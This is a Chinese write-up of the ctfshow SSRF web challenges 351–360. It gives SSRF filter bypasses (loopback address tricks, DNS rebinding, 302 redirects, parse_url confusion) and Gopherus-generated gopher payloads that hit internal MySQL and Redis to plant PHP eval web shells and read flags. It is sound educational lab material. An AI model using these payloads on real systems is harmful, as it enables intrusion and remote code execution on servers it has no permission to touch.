ctfshow web入门 ssrf web351~web360
目录
- SSRF基础
- web351
- web352、353
- web354
- web355
- web356
- web357
- web358
- web359
- web360
SSRF基础
SSRF(Server-Side Request Forgery:服务器端请求伪造)
就是让服务器去请求服务器的资源,因为我们远程请求不到。
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
?>
- curl_init():初始curl会话
- curl_setopt():会话设置
- curl_exec():执行curl会话,获取内容
- curl_close():会话关闭
gopher协议
通过gopher协议,将请求体用url编码后加上任意字符,一般是下划线,接上gopher的url即可执行GET、POST请求
gopher://ip:port/_[stream]
web351
如果我们直接访问flag.php,会提示不允许外网访问,所以我们需要利用ssrf。
payload:
url=http://127.0.0.1/flag.php
服务器处理这个值的时候,就是curl本机的flag.php文件。
web352、353
post接收url参数,然后用parse_url函数,将返回值给x
parse_url函数用法:PHP: parse_url - Manual
题目就是说,必须要用http或者https协议,然后不能使用localhost|127.0.0字符串。
我们需要绕过localhost|127.0.0,用0可以代替127.0.0.1
payload:
url=http://0/flag.php
另外的绕过方法:
- 127.1会被解析成127.0.0.1,也就意味着为零可缺省
- 在Linux中,0也会被解析成127.0.0.1
- 127.0.0.0/8是一个环回地址网段,从127.0.0.1 ~ 127.255.255.254都表示localhost
- ip地址还可以通过表示成其他进制的形式访问,IP地址二进制、十进制、十六进制互换
payload:
url=http://127.1/flag.php
url=http://0/flag.php
url=http://127.255.255.254/flag.php
url=http://2130706433/flag.php
web354
过滤了localhost、1、0
1和0都过滤了那我们之前的payload就不好用了。
方法一:域名指向
在自己的域名中添加一条A记录指向 127.0.0.1
或者使用 http://sudo.cc这个域名就是指向127.0.0.1
payload:
url=http://sudo.cc/flag.php
方法二:302跳转
在自己的vps的web网页页面添加:
header("Location:http://127.0.0.1/flag.php")
这样当服务器接收到我们传自己vps的域名时候,去curl它然后就会被重定向到自己127.0.0.1的flag.php文件。
payload:
url=http://xxxxx/xxx.php
web355
过滤,限制http://[host]/[path] host部分长度小于5。
url=http://127.1/flag.php
url=http://0/flag.php
web356
过滤,限制http://[host]/[path] host部分长度小于3。
url=http://0/flag.php
web357
因为代码中使用了 gethostbyname 获取了真实 IP 地址,所以域名指向方法不能再使用,可以使用 302 跳转方法 和 dns rebinding 方法。
DNS rebinding(DNS重新绑定攻击)
攻击重点在于DNS服务能够在两次DNS查询中返回不同的IP地址,第一次是真正的IP,第二次是攻击目标IP地址,甚至可以通过这种攻击方法绕过同源策略。
回到题目,在题目代码中一共对域名进行了两次请求,第一次是 gethostbyname 方法,第二次则是 file_get_contents 文件读取,可以通过 DNS重绑定 来实现攻击。
去CEYE 注册账号,在个人信息页面,点击下面的+ New DNS,添加127.0.0.1和39.156.66.10(随便一个可用的ip)。
翻阅ceye的DNS Rebinding页面的介绍,有这么一句话:
If your identifier is
abcdef.ceye.io, then your DNS rebinding host isr.abcdef.ceye.io.
所以要使用DNS重定向,我们要在域名前面加上r.
payload:
url=http://r.xxxxx.ceye.io/flag.php
不行就多点几次
web358
正则,必须要以http://ctf.开头,以show结尾
- 当
parse_url()解析到邮箱时:@前面是user file_get_contents()会访问host:port/path,与user无关
因此构建payload:
url=http://[email protected]/flag.php#show
web359
题目提示:打无密码的mysql
一个登录界面,点击登录,抓包发现可疑参数 returl 存在 SSRF
使用Gopherus工具,选择mysql模块,默认用户root,sql注入语句写个shell文件:
python gopherus.py --exploit mysql
Give MySQL username: root
Give query to execute: select "$_POST[cmd]); ?>" into outfile "/var/www/html/cmd.php";
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%20%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%63%6d%64%5d%29%3b%20%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%63%6d%64%2e%70%68%70%22%3b%01%00%00%00%01
还需要进行一次url编码(从_开始),payload:
returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254c%2500%2500%2500%2503%2520%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2563%256d%2564%255d%2529%253b%2520%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2522%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2563%256d%2564%252e%2570%2568%2570%2522%253b%2501%2500%2500%2500%2501
然后访问cmd.php,post:
cmd=system('cat /flag.txt');
web360
利用gopher协议打redis也可以用Gopherus
$ python gopherus.py --exploit redis
What do you want?? (ReverseShell/PHPShell): php
Give web root location of server (default is /var/www/html):
Give PHP Payload (We have default PHP Shell): <?php eval($_POST[cmd]); ?>
Your gopher link is Ready to get PHP Shell:
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bcmd%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.
payload要把它再进行一次URLEncode
url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252431%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255Bcmd%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
再访问/shell.php执行命令即可
cmd=system("cat /flaaag");
学习链接:
-
CTFshow刷题日记-WEB-SSRF(web351-360)SSRF总结 - UCloud云社区
-
CTFshow_Web_SSRF——web351~web360(除354、357)_Ho1aAs的博客-CSDN博客